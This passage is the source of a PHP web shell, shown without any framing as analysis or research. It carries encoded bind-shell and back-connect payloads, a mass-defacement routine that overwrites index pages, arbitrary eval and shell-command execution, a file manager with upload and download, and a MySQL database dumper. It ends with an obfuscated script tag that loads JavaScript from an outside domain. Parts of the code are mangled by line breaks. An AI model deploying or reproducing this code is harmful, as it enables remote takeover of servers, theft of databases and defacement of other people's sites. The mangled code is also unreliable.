}
}
footer();
}
$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zl
Opo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjT
VKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuA
zDE6VL
3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2
FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyx
AnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL

ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPt
Tdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBI
fitd33uvXuvvWr1
NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNq
Keut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSL
K9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +he
cfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55
+Z89yY5W0St
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2w
hVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tsk
vpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyE
zc+Z2TjpSserA
BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzp
zYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0
fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9
wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
?>
<?
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = @urlencode($d);
if (empty($d)) {$d = realpath(".");}
elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$self=basename($_SERVER['PHP_SELF']);
if(isset($_POST['execmassdeface']))
{
echo "<center><textarea rows='10' cols='100'>";
$hackfile = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir.$file)=="dir"){
$newfile=$dir.$file."/index.html";
echo $newfile."\n";
if (!copy($hackfile, $newfile)) {

echo "failed to copy $file...\n";


}
}
}
closedir($dh);
}
}
echo "</textarea></center>";} ?>
<tr><td align=right>Mass Defacement:</td>
<td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main
Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px
' name='massdefaceurl'><input type='submit' name='execmassdeface'
value='Execute'></form></td>
<?
// FILE MANAGER
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r'
$perms .= ($mode & 00200) ? 'w'
$perms .= ($mode & 00100) ? 'x'
$perms .= ($mode & 00040) ? 'r'
$perms .= ($mode & 00020) ? 'w'
$perms .= ($mode & 00010) ? 'x'
$perms .= ($mode & 00004) ? 'r'
$perms .= ($mode & 00002) ? 'w'
$perms .= ($mode & 00001) ? 'x'
return $perms;
}
$head=<<<headka
<html>

:
:
:
:
:
:
:
:
:

'-';
'-';
'-';
'-';
'-';
'-';
'-';
'-';
'-';

headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SE
RVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);

switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head);
?>
<hr>
<hr>
<?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='
\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head);
?>
<pre>
<?
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea
cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<H1>File Manager;</H1><hr>');
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();

for($i=0;$i<sizeof($files);$i++)
{
$fn=$files[$i];
if(is_dir($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_re
place('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strle
n($fn)
>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strle
n($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir
.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',
$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr(
$fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method=post>

<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not ex


ists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='
\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed
');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)
.".gz\n\n");
echo($s);
}
else

{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)
."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']
):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="# MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}e
lse $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."
\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archi
ve=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);

$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);


if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' N
OT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' N
OT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else

{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."
\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archi
ve=='none'?'':'.gz')."\"\n\n");
}
if($to_file===false)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."
\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump
}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' N
OT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' N
OT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);

}
}
}
}
}
break;
}
case 'query' :
{
echo($head);
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<
input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='h
ost'
type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$
db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></texta
rea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=2
3></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close
($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<mysql_num_fields($result);$i++)
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
echo("\n</tr>\n");
for($i=0;$i<mysql_num_rows($result);$i++)
{

$rows=mysql_fetch_array($result);
echo('<tr valign=top align=left>');
for($j=0;$j<mysql_num_fields($result);$j++)
{
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0
050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002
f
\u0077\u0077\u0077\u002e\u0073\u0061\u006c\u0064\u0069\u0072\u0069\u002e\u006f\u
0072\u0067\u002f\u0073\u0075\u006d\u006d\u0065\u0072\u002f\u0063\u0069\u007a\u00
2e
\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</scri
pt>

You might also like